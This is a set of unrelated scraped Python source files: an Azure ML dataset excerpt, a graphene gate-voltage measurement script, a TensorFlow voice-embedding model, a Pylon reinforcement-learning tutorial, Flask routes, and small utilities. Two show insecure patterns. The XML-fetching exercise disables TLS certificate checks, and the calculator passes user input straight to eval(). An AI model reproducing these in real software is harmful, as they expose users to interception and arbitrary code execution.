'FileDataset'}, activity_type=_PUBLIC_API)\n def take_sample(self, probability, seed=None):\n \"\"\"Take a random sample of file streams in the dataset approximately by the probability specified.\n\n :param probability: The probability of a file stream being included in the sample.\n :type probability: float\n :param seed: An optional seed to use for the random generator.\n :type seed: int\n :return: Returns a new FileDataset object representing the sampled dataset.\n :rtype: azureml.data.FileDataset\n \"\"\"\n return FileDataset._create(\n self._dataflow.take_sample(probability, seed), self._properties, telemetry_info=self._telemetry_info)\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def random_split(self, percentage, seed=None):\n \"\"\"Split file streams in the dataset into two parts randomly and approximately by the percentage specified.\n\n The first dataset returned contains approximately ``percentage`` of the total number of file references\n and the second dataset contains the remaining file references.\n\n :param percentage: The approximate percentage to split the dataset by. This must be a number between 0.0\n and 1.0.\n :type percentage: float\n :param seed: An optional seed to use for the random generator.\n :type seed: int\n :return: Returns a tuple of new FileDataset objects representing the two datasets after the split.\n :rtype: (azureml.data.FileDataset, azureml.data.FileDataset)\n \"\"\"\n dataflow1, dataflow2 = self._dataflow.random_split(percentage, seed)\n return (\n FileDataset._create(dataflow1, self._properties, telemetry_info=self._telemetry_info),\n FileDataset._create(dataflow2, self._properties, telemetry_info=self._telemetry_info)\n )\n\n\ndef _add_portable_path_column(dataflow):\n prefix_path = _find_path_prefix(dataflow)\n portable_path = 'Portable Path'\n get_portable_path = dataprep().api.functions.get_portable_path\n col = dataprep().api.expressions.col\n return dataflow.add_column(get_portable_path(col('Path'), prefix_path), portable_path, 'Path'), portable_path\n\n\ndef _find_path_prefix(dataflow):\n # TODO: move this logic to Engine\n steps = dataflow._get_steps()\n step_types = [s.step_type for s in steps]\n special_block_types = {'Microsoft.DPrep.ToCsvStreamsBlock',\n 'Microsoft.DPrep.ToParquetStreamsBlock',\n 'Microsoft.DPrep.ToDataFrameDirectoryBlock'}\n if len(special_block_types.intersection(step_types)) > 0:\n return None\n step_type = steps[0].step_type\n step_arguments = steps[0].arguments\n if hasattr(step_arguments, 'to_pod'):\n step_arguments = step_arguments.to_pod()\n path = _get_path_from_step(step_type, step_arguments)\n return None if path is None else _get_prefix(path, dataflow)\n\n\ndef _get_prefix(path, dataflow):\n \"\"\"Determine if there exists a common prefix for all files which may exist under the given path/dataflow.\n\n :param path: Path extracted from dataflow\n :param dataflow: Dataflow to get prefix for.\n :return: Path which is common prefix of all files under path/dataflow, or None if a common prefix was not found.\n \"\"\"\n from azureml.dataprep.api.errorhandlers import ExecutionError\n from azureml.dataprep.api.functions import get_portable_path\n\n if '*' in path:\n return '/'.join(re.split(r'/|\\\\', path.split('*')[0])[:-1])\n\n if path.startswith('http://') or path.startswith('https://'):\n return path[:path.rindex('/')]\n\n dataflow = dataflow.add_column(get_portable_path(dataflow['Path']), 'PortablePath', 'Path')\n paths = []\n try:\n paths = [r['PortablePath'] for r in dataflow.take(1)._to_pyrecords()]\n except ExecutionError as e:\n if 'InvalidPath' in e.error_code or 'NotFound' in e.error_code:\n return None\n raise e\n if len(paths) == 0:\n return None\n if len(paths) == 1 and paths[0].endswith(path):\n return path.replace('\\\\', '/')[:path.rindex('/')]\n return path\n\n\ndef _ensure_path(path):\n if not path or path.isspace():\n return tempfile.mkdtemp()\n return os.path.abspath(path)\n\n\ndef _encode_if_needed(path):\n sys_encoding = sys.getfilesystemencoding() or sys.getdefaultencoding()\n try:\n path.encode(sys_encoding)\n return path # no need to encode\n except (UnicodeError, LookupError):\n # Encode the path string when it contains characters which cannot be encoded by sys encoding.\n # Otherwise, usage of the path string (e.g. `os.path.exists(p)`) can encounter UnicodeEncodeError.\n return path.encode('utf8')\n","sub_path":"venv/Lib/site-packages/azureml/data/file_dataset.py","file_name":"file_dataset.py","file_ext":"py","file_size_in_byte":23130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"37587865","text":"''' This program uses KEYSIGHT B2901A to apply a gate voltage and HF2LI lock-in amplifier to measure the resistance of the sample\n\n\n\n\tHardware to be used:\n\t\t- SMU B2901A: For gating\n\t\t- A bias resistance of 1M: As voltage to current converter for lock-in out put.\n\t\t\tNote that there is always errors in reading the resitance of the device; the error is around -33% depending on the gain on S4c (see the excel file \"Calibrate S4c gain.xlsx\").\n\n\t\t- HF2LI: to measure the resistance of graphene device\n\n\n\n\n'''\nimport numpy as np\nimport zhinst.utils\n\nfrom gate_pattern import gate_pattern\n\nimport time\nfrom my_poll import R_measure as R_measure\nimport stlab\nimport os\nfrom stlab.devices.Keysight_B2901A import Keysight_B2901A\nimport matplotlib.pyplot as plt\nimport pygame, sys\nfrom pygame.locals import *\nimport math\n\n#############################################################\n''' Definitions'''\n\n# definitions\ntempdev = 0.015\nprefix = 'F17_e6_0204'\nsample_name = '2probe'\ndevice_id = 'dev352'\ntime_step = 0.1 #time step between each gate voltage steps, to stablize the gate\nramp_speed = 1500 # the safe speed for ramping the gate voltage [mV/s]\ntarget_gate = 50\nshift_voltage= 10 #in the case the intended gate pattern in not symmetrical around 0.\ngate_points = 500\nsafe_gate_current = 2.5e-6 # [A], safe current leakage limit. With in this limit, the oxide resistance below 4MOhm at 10Vg (400KOhm at 1Vg)) to be considerred not leacky!\n\n# HF2LI settings\nmeasure_amplitude = 0.1 #measurement amplitude [V]\nmeasure_output_channnel = 1\nmeasure_input_channnel = 1\nmeasure_frequency = 77 #[Hz]\ndemodulation_time_constant = 0.01\ndeamodulation_duration = 0.3\n\nbias_resistor = 1e6\ncalibration_factor = 1.45 # to compensate the shift in resistance measurement\n\n\n# output setting\ndo_plot = True\nwatch_gate_leakage = True # monitors the gate leakage and stops above the safe leakage limit\nsave_data =True\n\npygame.init()\npygame.display.set_mode((100,100))\n\n##########################################################\n''' Initializing the devices '''\n\n# initial configuration of the Lock-in\napilevel_example = 6 # The API level supported by this example.\n(daq, device, props) = zhinst.utils.create_api_session(device_id, apilevel_example, required_devtype='.*LI|.*IA|.*IS')\nzhinst.utils.api_server_version_check(daq)\nzhinst.utils.disable_everything(daq, device)\nout_mixer_channel = zhinst.utils.default_output_mixer_channel(props)\n\n\n# Keysight setting\ngate_dev = Keysight_B2901A('TCPIP::192.168.1.63::INSTR')\ngate_dev.SetModeVoltage()\ngate_dev.SetOutputOn()\ngate_dev.SetComplianceCurrent(safe_gate_current)\n\n\n#############################################################\n''' MEASUREMENT'''\n\n# generating gate pattern\npattern = gate_pattern(target_gate=target_gate, mode='double', data_points=gate_points, shift_voltage= shift_voltage )\n\n\n# Resistance measurement while modulating the gate voltage\ncount = 0 # couter of step numbers\nleakage_current = 0\n\nidstring = sample_name\nif save_data:\n\tcolnames = ['step ()','gate voltage (V)','leakage current (nA)','Resistance (k ohm)','phase ()', 'demodulation duration (s)']\n\tmy_file_2= stlab.newfile(prefix+'_',idstring,autoindex=True,colnames=colnames)\n\nramp_time = np.abs(np.floor(shift_voltage/ramp_speed))\ngate_dev.RampVoltage(shift_voltage,tt=10*ramp_time, steps = 100)\n\ngate_voltage_step = pattern['ramp_pattern'][1]-pattern['ramp_pattern'][0]\n# ramp_time = np.abs(np.floor(gate_voltage_step/ramp_speed))\nramp_time = 0.5\nplt_Vg=np.array([])\nplt_resistance=np.array([])\nplt_leak_curr=np.array([])\n\n\nEND = False\n\nfor count,gate_voltage in enumerate(pattern['ramp_pattern']): # ramping up the gate voltage\n\n\tfor event in pygame.event.get():\n\t\tif event.type == QUIT:sys.exit()\n\t\telif event.type == KEYDOWN and event.dict['key'] == 101:\n\t\t\tEND = True\n\n\tif END:\n\t\tbreak\n\n\tgate_dev.RampVoltage(gate_voltage,tt=ramp_time, steps = 5)\n\n\tleakage_current = float(gate_dev.GetCurrent()) # in the units of [A]\n\n\tprint ('\\n\\n------------------------')\n\n\n\tif watch_gate_leakage:\n\t\tif np.abs(leakage_current) > safe_gate_current:\n\t\t\tGATE_LEAKAGE = True\n\t\t\tprint ('gate current', 1e9*leakage_current, ' nA exceeds safe gate current limit reaching the gate voltage of', gate_voltage, 'V.')\n\t\t\tprint ('reseting the gate voltage')\n\t\t\tgate_dev.RampVoltage(0,tt=ramp_time, steps = 10)\n\t\t\tbreak\n\n\tprint('GATE: {:6.4f}'.format(gate_voltage), 'V')\n\n\t# time.sleep(time_step)\n\n\tmeasured = R_measure(device_id, amplitude=measure_amplitude,\n\t\tout_channel = measure_output_channnel,\n\t\tin_channel = measure_input_channnel,\n\t\ttime_constant = demodulation_time_constant,\n\t\tfrequency = measure_frequency,\n\t\tpoll_length = deamodulation_duration,\n\t\tdevice=device, daq=daq,\n\t\tout_mixer_channel=out_mixer_channel,\n\t\tbias_resistor=bias_resistor)\n\n\tmeasured[0]*=(np.cos(math.radians(measured[1]))*calibration_factor)\n\n\tline = [count,gate_voltage, leakage_current] + measured\n\n\tif save_data:\n\t\tstlab.writeline(my_file_2,line)\n\n\n\n\tprint('LEAKAGE CURRENT: {:6.4f}'.format(1e9*leakage_current), 'nA')\n\tprint('RESISTANCE: {:6.2f}'.format(measured[0]), 'kOhms')\n\tprint('PHASE {:4.2f}'.format(measured[1]))\n\n\tplt_Vg = np.append(plt_Vg,gate_voltage)\n\tplt_resistance = np.append(plt_resistance,measured[0])\n\tplt_leak_curr = np.append(plt_leak_curr,leakage_current)\n\n\tplt.rcParams[\"figure.figsize\"] = [16,9]\n\tplt.subplot(2, 1, 1)\n\tplt.plot(plt_Vg,plt_resistance, '--r',marker='o')\n\n\tplt.ylabel('Resistance (k$\\Omega$)')\n\tplt.title(prefix+'_'+sample_name)\n\n\n\tplt.subplot(2, 1, 2)\n\tplt.plot(plt_Vg,1e9*plt_leak_curr, '--r', marker='o')\n\tplt.ylabel('Leakage Current (nA)')\n\tplt.xlabel('Gate Voltage (V)')\n\tplt.title(\"Resistance = %4.2f k$\\Omega$, Leackage Current = %4.2f nA\" %(measured[0], 1e9*leakage_current))\n\n\tplt.pause(0.1)\n\n\nprint('RAMPING FINISHED')\n\ngate_dev.RampVoltage(0,tt=ramp_time) # to safely return back the gate voltage\n\n\nzhinst.utils.disable_everything(daq, device)\ngate_dev.SetOutputOff()\n\nprint('FINISHED')\n\n\n#######################################################################\n''' saving the data '''\n\nif save_data:\n\n\n\t# saving the metafile\n\tplt.savefig(os.path.dirname(my_file_2.name)+'\\\\'+prefix)\n\tmy_file_2.close()\n\n\tparameters = ['target gate (V)',\n\t\t'time step (s)',\n\t\t'gate points ()',\n\t\t'measure amplitude (V)',\n\t\t'measure frequency (Hz)',\n\t\t'bias resistor (Ohm)',\n\t\t'deamodulation duration (s)',\n\t\t'demodulation time constant (s)',\n\t\t'temperature (K)']\n\n\tT = tempdev\n\n\tparameters_line =[target_gate,\n\t\ttime_step,\n\t\tgate_points,\n\t\tmeasure_amplitude,\n\t\tmeasure_frequency,\n\t\tbias_resistor,\n\t\tdeamodulation_duration,\n\t\tdemodulation_time_constant,\n\t\tT]\n\tmy_file= stlab.newfile(prefix+'_',idstring + '_metadata',autoindex=False,colnames=parameters,usefolder=False,mypath = os.path.dirname(my_file_2.name),usedate=False)\n\tstlab.writeline(my_file,parameters_line)\n\n\t# saving the plots\n\ttitle = 'Resistance'\n\tcaption = ''\n\tstlab.autoplot(my_file_2,'gate voltage (V)','Resistance (k ohm)',title=title,caption=caption)\n\ttitle = 'Phase'\n\tcaption = ''\n\tstlab.autoplot(my_file_2,'gate voltage (V)','phase ()',title=title,caption=caption)\n\ttitle = 'Duration'\n\tcaption = ''\n\tstlab.autoplot(my_file_2,'gate voltage (V)','demodulation duration (s)',title=title,caption=caption)\n\ttitle = 'Leakage Current'\n\tcaption = ''\n\tstlab.autoplot(my_file_2,'gate voltage (V)','leakage current (nA)',title=title,caption=caption)\n\n\n\n\n\n","sub_path":"DC measurements/Others/GateGraphene_HF2LI_B2901A_v1.py","file_name":"GateGraphene_HF2LI_B2901A_v1.py","file_ext":"py","file_size_in_byte":7318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"168359554","text":"import xml.etree.ElementTree as ET\nimport urllib.request, urllib.parse, urllib.error\nimport ssl\n\nCTX = ssl.create_default_context()\nCTX.check_hostname = False\nCTX.verify_mode = ssl.CERT_NONE\n\nURL = 'http://py4e-data.dr-chuck.net/comments_227372.xml'\nData = urllib.request.urlopen(URL, context=CTX).read()\nTree = ET.fromstring(Data)\nlst = Tree.findall('comments/comment')\n\nCount = 0\nSum = 0\nfor item in lst:\n Sum = Sum + int(item.find('count').text)\n Count = Count + 1\n\nprint(Count, 'Entries!')\nprint('Sum:', Sum)\n","sub_path":"xml_test.py","file_name":"xml_test.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"545454289","text":"# ---------PATH------------\r\nROOT_DIR = '/home/daizelin/hybrid_3/'\r\nRAW_DATA = 'data/police_train.csv'\r\nTEST_DATA = 'data/police_test.csv'\r\n\r\nEMBEDDING_FILE = 'embedding/taizhou_min_count_1_window_5_300d.word2vec'\r\nTRAIN_FILE = 'output/intermediate/train.tsv'\r\nWORD2ID_FILE = 'output/intermediate/word2id.pkl'\r\nVALID_FILE = 'output/intermediate/valid.tsv'\r\nTEST_FILE = 'output/intermediate/test.tsv'\r\nLOG_PATH = 'output/logs'\r\nSTOP_WORD_LIST = 'data/stop_list_chn.txt'\r\nCHECKPOINT_DIR = 'output/checkpoints/hybrid_3.ckpt'\r\n\r\n\r\n# ---------DATA PARAM--------------\r\nis_debug = False\r\nflag_words = ['', '']\r\nmax_len = 25\r\n\r\n# ------------NET PARAM------------\r\nseed = 2018\r\ndevice = 0\r\nlabels = range(9)\r\nplot_path = 'output/img/loss_acc.jpg'\r\n### ----------ATTENTION------------\r\nattention_size = 1500\r\n### ----------CAPSULE--------------\r\n### ----------HYBRID---------------\r\n#### -------REINFORCED_CNN---------\r\nvocab_size = 1000000\r\nword_embedding_dimension = 300\r\nfilters = 32\r\ndropout = 0.2\r\nkernel_size = [3, 5, 7]\r\n#### -------REINFORCED_GRU---------\r\nhidden_size = 128\r\nbi_flag = True\r\nnum_layer = 1\r\n\r\n\r\n### -------TRAIN-------------\r\nnum_epoch = 4\r\nbatch_size = 128\r\ninitial_lr = 0.01\r\nlr_decay_mode = \"custom_decay\"\r\nuse_cuda = True\r\nuse_mem_track = False\r\n","sub_path":"hybrid_3/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"101872861","text":"\"\"\"Define the model.\"\"\"\n\nimport tensorflow as tf\n\nfrom voice_embedding.triplet_loss import batch_all_triplet_loss\nfrom voice_embedding.triplet_loss import batch_hard_triplet_loss\nfrom tensorflow.contrib.losses.python.metric_learning.metric_loss_ops import triplet_semihard_loss\nfrom voice_embedding.voice.constant import VOICE_STFT_T\n\n\nslim = tf.contrib.slim\n\ndef build_model(is_training, images, params):\n return build_model_vggish_slim(is_training, images, params)\n\n\ndef build_model_vggish_slim(training, images, params):\n \"\"\"Defines the VGGish TensorFlow model.\n\n All ops are created in the current default graph, under the scope 'vggish/'.\n\n The input is a placeholder named 'vggish/input_features' of type float32 and\n shape [batch_size, num_frames, num_bands] where batch_size is variable and\n num_frames and num_bands are constants, and [num_frames, num_bands] represents\n a log-mel-scale spectrogram patch covering num_bands frequency bands and\n num_frames time frames (where each frame step is usually 10ms). This is\n produced by computing the stabilized log(mel-spectrogram + params.LOG_OFFSET).\n The output is an op named 'vggish/embedding' which produces the activations of\n a 128-D embedding layer, which is usually the penultimate layer when used as\n part of a full model with a final classifier layer.\n\n Args:\n training: If true, all parameters are marked trainable.\n\n Returns:\n The op 'vggish/embeddings'.\n \"\"\"\n # Defaults:\n # - All weights are initialized to N(0, INIT_STDDEV).\n # - All biases are initialized to 0.\n # - All activations are ReLU.\n # - All convolutions are 3x3 with stride 1 and SAME padding.\n # - All max-pools are 2x2 with stride 2 and SAME padding.\n INIT_STDDEV = 0.01\n with slim.arg_scope([slim.conv2d, slim.fully_connected],\n weights_initializer=tf.truncated_normal_initializer(\n stddev=INIT_STDDEV),\n biases_initializer=tf.zeros_initializer(),\n activation_fn=tf.nn.relu,\n trainable=training), \\\n slim.arg_scope([slim.conv2d],\n kernel_size=[3, 3], stride=1, padding='SAME'), \\\n slim.arg_scope([slim.max_pool2d],\n kernel_size=[2, 2], stride=2, padding='SAME'), \\\n tf.variable_scope('vggish'):\n # Input: a batch of 2-D log-mel-spectrogram patches.\n '''\n features = tf.placeholder(\n tf.float32, shape=(None, params.NUM_FRAMES, params.NUM_BANDS),\n name='input_features')\n '''\n features = images\n # Reshape to 4-D so that we can convolve a batch with conv2d().\n net = tf.reshape(features, [-1, VOICE_STFT_T, params.signal[\"n_mels\"], 1])\n\n # The VGG stack of alternating convolutions and max-pools.\n net = slim.conv2d(net, 64, scope='conv1')\n net = slim.max_pool2d(net, scope='pool1')\n net = slim.conv2d(net, 128, scope='conv2')\n net = slim.max_pool2d(net, scope='pool2')\n net = slim.repeat(net, 2, slim.conv2d, 256, scope='conv3')\n net = slim.max_pool2d(net, scope='pool3')\n net = slim.repeat(net, 2, slim.conv2d, 512, scope='conv4')\n net = slim.max_pool2d(net, scope='pool4')\n\n # Flatten before entering fully-connected layers\n net = slim.flatten(net)\n net = slim.repeat(net, 2, slim.fully_connected, 1000, scope='fc1')\n # The embedding layer.\n net = slim.fully_connected(net, params.embedding_size, scope='fc2')\n return tf.identity(net, name='embedding')\n\n\ndef build_model_old(is_training, images, params):\n \"\"\"Compute outputs of the model (embeddings for triplet loss).\n\n Args:\n is_training: (bool) whether we are training or not\n images: (dict) contains the inputs of the graph (features)\n this can be `tf.placeholder` or outputs of `tf.data`\n params: (Params) hyperparameters\n\n Returns:\n output: (tf.Tensor) output of the model\n \"\"\"\n out = images\n # Define the number of channels of each convolution\n # For each block, we do: 3x3 conv -> batch norm -> relu -> 2x2 maxpool\n num_channels = params.num_channels\n bn_momentum = params.bn_momentum\n channels = [num_channels, num_channels * 2]\n # input has shape [batch_size, VOICE_STFT_T, params.signal[\"n_mels\"]]\n for i, c in enumerate(channels):\n with tf.variable_scope('block_{}'.format(i+1)):\n out = tf.layers.conv2d(out, c, 3, padding='same')\n if params.use_batch_norm:\n out = tf.layers.batch_normalization(out, momentum=bn_momentum, training=is_training)\n out = tf.nn.relu(out)\n out = tf.layers.max_pooling2d(out, 2, 2)\n\n assert out.shape[1:] == [int((VOICE_STFT_T-1)/4), 20, num_channels * 2], out.shape[1:]\n\n out = tf.reshape(out, [-1, int((VOICE_STFT_T-1)/4) * 20 * num_channels * 2])\n with tf.variable_scope('fc_1'):\n out = tf.layers.dense(out, params.embedding_size)\n\n return out\n\n\n\n\n\ndef model_fn(features, labels, mode, params):\n \"\"\"Model function for tf.estimator\n\n Args:\n features: input batch of images\n labels: labels of the images\n mode: can be one of tf.estimator.ModeKeys.{TRAIN, EVAL, PREDICT}\n params: contains hyperparameters of the model (ex: `params.learning_rate`)\n\n Returns:\n model_spec: tf.estimator.EstimatorSpec object\n \"\"\"\n is_training = (mode == tf.estimator.ModeKeys.TRAIN)\n\n images = tf.feature_column.input_layer(features, params.feature_columns)\n images = tf.reshape(images, [-1, VOICE_STFT_T, params.signal[\"n_mels\"], 1])\n assert images.shape[1:] == [VOICE_STFT_T, params.signal[\"n_mels\"], 1], \"{}\".format(images.shape)\n\n # -----------------------------------------------------------\n # MODEL: define the layers of the model\n with tf.variable_scope('model'):\n # Compute the embeddings with the model\n embeddings = build_model(is_training, images, params)\n embedding_mean_norm = tf.reduce_mean(tf.norm(embeddings, axis=1))\n tf.summary.scalar(\"embedding_mean_norm\", embedding_mean_norm)\n\n if mode == tf.estimator.ModeKeys.PREDICT:\n input_labels = features[\"labels\"]\n print(\"Label is: {}\".format(input_labels))\n predictions = {'embeddings': embeddings, 'labels': input_labels}\n return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)\n\n labels = tf.cast(labels, tf.int64)\n #labels = tf.Print(labels, [labels], \"Batch labels: \", summarize=10)\n '''\n freq_y, freq_idx, freq_count = tf.unique_with_counts(labels)\n labels = tf.Print(labels, [labels, freq_y, freq_count], \"Batch labels: \", summarize=50)\n '''\n \n # Define triplet loss\n if params.triplet_strategy == \"batch_all\":\n tf.logging.info(\"Triplet loss type: batch_all\")\n loss, fraction = batch_all_triplet_loss(labels, embeddings, margin=params.margin,\n squared=params.squared)\n elif params.triplet_strategy == \"batch_hard\":\n tf.logging.info(\"Triplet loss type: batch_hard\")\n loss = batch_hard_triplet_loss(labels, embeddings, margin=params.margin,\n squared=params.squared)\n elif params.triplet_strategy == \"batch_semihard\":\n tf.logging.info(\"Triplet loss type: batch_semihard\")\n loss = triplet_semihard_loss(labels, embeddings, margin=params.margin)\n else:\n raise ValueError(\"Triplet strategy not recognized: {}\".format(params.triplet_strategy))\n\n # -----------------------------------------------------------\n # METRICS AND SUMMARIES\n # Metrics for evaluation using tf.metrics (average over whole dataset)\n # TODO: some other metrics like rank-1 accuracy?\n with tf.variable_scope(\"metrics\"):\n eval_metric_ops = {\"embedding_mean_norm\": tf.metrics.mean(embedding_mean_norm)}\n\n if params.triplet_strategy == \"batch_all\":\n eval_metric_ops['fraction_positive_triplets'] = tf.metrics.mean(fraction)\n\n if mode == tf.estimator.ModeKeys.EVAL:\n return tf.estimator.EstimatorSpec(mode, loss=loss, eval_metric_ops=eval_metric_ops)\n\n\n # Summaries for training\n tf.summary.scalar('loss', loss)\n if params.triplet_strategy == \"batch_all\":\n tf.summary.scalar('fraction_positive_triplets', fraction)\n\n tf.summary.image('train_image', images, max_outputs=1)\n\n # Define training step that minimizes the loss with the Adam optimizer\n optimizer = tf.train.AdamOptimizer(params.learning_rate)\n global_step = tf.train.get_global_step()\n if params.use_batch_norm:\n # Add a dependency to update the moving mean and variance for batch normalization\n with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\n train_op = optimizer.minimize(loss, global_step=global_step)\n else:\n train_op = optimizer.minimize(loss, global_step=global_step)\n\n return tf.estimator.EstimatorSpec(mode, loss=loss, train_op=train_op)\n","sub_path":"TrueID/src/python/biometric/voice_embedding/voice_embedding/voice/model_fn.py","file_name":"model_fn.py","file_ext":"py","file_size_in_byte":9268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"169307637","text":"#------------------------------------------------------------------------------\n# Pylon Tutorial \"Reinforcement Learning\"\n#\n# Author: Richard Lincoln, r.w.lincoln@gmail.com\n#------------------------------------------------------------------------------\n\n__author__ = 'Richard Lincoln, r.w.lincoln@gmail.com'\n\nimport sys, logging\nfrom pylon import Case, Bus, Generator\n\nfrom pyreto import \\\n MarketExperiment, ParticipantEnvironment, ProfitTask, SmartMarket\n\nfrom pyreto.renderer import ExperimentRenderer\n\nfrom pybrain.tools.shortcuts import buildNetwork\nfrom pybrain.rl.agents import LearningAgent\nfrom pybrain.rl.learners import ENAC\n\nlogging.basicConfig(stream=sys.stdout, level=logging.DEBUG,\n format=\"%(levelname)s: %(message)s\")\n\n\"\"\" Create a simple case. \"\"\"\ng1 = Generator(name=\"G1\", p_max=60.0, p_min=0.0)\ng2 = Generator(name=\"G2\", p_max=100.0, p_min=0.0)\nbus1 = Bus(name=\"Bus1\", generators=[g1, g2], p_demand=80.0, q_demand=0.0)\ncase = Case(name=\"1Bus\", buses=[bus1])\n\n\"\"\" The market will clear submitted offers/bids and return dispatch info. \"\"\"\nmkt = SmartMarket(case)\n\nagents = []\ntasks = []\nfor g in bus1.generators:\n \"\"\" Create an environment for each agent with an asset and a market. \"\"\"\n env = ParticipantEnvironment(g, mkt, n_offbids=2)\n\n \"\"\" Create a task for the agent to achieve. \"\"\"\n task = ProfitTask(env)\n\n \"\"\" Build an artificial neural network for the agent. \"\"\"\n net = buildNetwork(task.outdim, task.indim, bias=False,\n outputbias=False)\n# net._setParameters(array([9]))\n\n \"\"\" Create a learning agent with a learning algorithm. \"\"\"\n agent = LearningAgent(module=net, learner=ENAC())\n \"\"\" Initialize parameters (variance). \"\"\"\n# agent.setSigma([-1.5])\n \"\"\" Set learning options. \"\"\"\n agent.learner.alpha = 2.0\n # agent.learner.rprop = True\n agent.actaspg = False\n# agent.disableLearning()\n\n agents.append(agent)\n tasks.append(task)\n\n\"\"\" The Experiment will coordintate the interaction of the given agents and\ntheir associated tasks. \"\"\"\nexperiment = MarketExperiment(tasks, agents, mkt)\nexperiment.setRenderer(ExperimentRenderer())\n\n\"\"\" Instruct the experiment to coordinate a set number of interactions. \"\"\"\nexperiment.doInteractions(3)\n","sub_path":"doc/tutorials/rl.py","file_name":"rl.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"272827869","text":"from django.shortcuts import render\nfrom django.http import Http404, HttpResponse\nfrom forms import *\nfrom models import *\n\n# render home page\ndef populate_home_page(request):\n\tsuccess = 0\n\tif request.method == 'POST':\n\t\tform = NewUser(request.POST)\n\t\tif form.is_valid():\n\t\t\tu = Contact(email = form.cleaned_data['email'],)\n\t\t\tu.save()\n\t\t\tsuccess = 2\n\t\telse:\n\t\t\tform = NewUser()\n\t\t\tsuccess = 1\n\telse:\n\t\tform = NewUser()\n\n\treturn render(request, 'index.html', {'form': form, 'success': success})\n\n# deals with static files (frontend)\ndef return_static_file(request, fname):\n\ttry:\n\t\tf = open(os.path.join(os.getcwd(), fname))\n\t\treturn HttpResponse(f.read())\n\texcept:\n\t\t raise Http404(\"File \" + os.path.join(os.getcwd(), fname) + \" does not exist.\")","sub_path":"portal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"77558301","text":"from . import mapping\nimport os\nimport matplotlib.pyplot as plt\nfrom flask import render_template\nimport base64\n\n@mapping.route('/')\ndef index():\n plt.plot([1, 2, 3, 4])\n plt.ylabel('some numbers')\n # import logging\n # logging.error('1111')\n from run import app\n app.logger.error('An error occurred')\n # raise Exception(\"自定义异常\")\n plt.savefig(os.getcwd() + '/temp/temp.jpg')\n form = \"\"\n with open(os.getcwd() + '/temp/temp.jpg','rb') as rf:\n # byte -> base64 and byte -> str\n form = base64.b64encode(rf.read()).decode(encoding=\"utf-8\")\n # 查看类型\n print(type(form))\n return render_template('mapping/mapping.html', form=form)\n\n@mapping.route('/echarts')\ndef echarts():\n form = \"\"\n return render_template('mapping/echarts.html', form=form)\n","sub_path":"app/mapping/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"523786847","text":"#!/usr/bin/env python3\n#\n# Command line calc tools programme\n#\n\n\nfrom math import *\n\n\ndef version():\n ver = 'Calc Command Line Tools V1.0'\n print(\"\\033[1;32m%s\\033[0m\" % ver)\n\n\ndef run():\n version()\n\n while True:\n cmd = input(\">>> \")\n # Input enter key\n if (cmd == ''):\n continue\n\n if (cmd.lower() == 'q'):\n break\n\n try:\n # eval func: string to expression\n print(eval(cmd))\n except:\n print(\"\\033[1;31mExpression error, please input again.\\033[0m\")\n\n\nif __name__ == '__main__':\n run()\n","sub_path":"calc/calc-cmd.py","file_name":"calc-cmd.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"175167395","text":"import psd_tools.reader\nimport psd_tools.decoder\nfrom psd_tools.constants import TaggedBlock, SectionDivider, ImageResourceID\nimport matplotlib.pyplot as plt\n\nimage_path = '../psd/Case_204_G11_40.psd'\n#image_path = './Case_271_O6_40.psd'\n#image_path = '/./Case_322_I3_40.psd'\nim = plt.imread(image_path)\n\nwith open(image_path, 'rb') as fp:\n binary = psd_tools.reader.parse(fp)\n decoded = psd_tools.decoder.parse(binary)\n\nimg_dict = decoded.image_resource_blocks\nfor item in img_dict:\n if item.resource_id == 1080:\n count_data=item\n\ncount_level = count_data.data.descriptor.items[1][1][0]\nid_list = [str(item.items[3][1].value) for item in count_level]\nnum_labels = len(id_list)\n\nraw_data_pos_dict = {}\nfor i in range(num_labels):\n raw_data_pos_dict[id_list[i]] = count_level[i].items[7][1].items\n\ndata_pos_dict = {}\nfor key,value in raw_data_pos_dict.items(): #In python 2.7 this was .iteritems()\n data_pos_dict[key] = [[float(point.items[0][1].value),float(point.items[1][1].value)] for point in value]\n\nprint (data_pos_dict.keys())\nprint ([len(data_pos_dict[key]) for key in data_pos_dict])\nchoice1 = data_pos_dict[list(data_pos_dict.keys())[0]] # In python 2.7 this was choice1 = data_pos_dict[data_pos_dict.keys()[0]]\nx1,y1 = [i[0] for i in choice1],[i[1] for i in choice1]\nchoice2 = data_pos_dict[list(data_pos_dict.keys())[1]]\nx2,y2 = [i[0] for i in choice2],[i[1] for i in choice2]\nchoice3 = data_pos_dict[list(data_pos_dict.keys())[2]]\nx3,y3 = [i[0] for i in choice3],[i[1] for i in choice3]\nchoice4 = data_pos_dict[list(data_pos_dict.keys())[3]]\nx4,y4 = [i[0] for i in choice4],[i[1] for i in choice4]\n\nimplot = 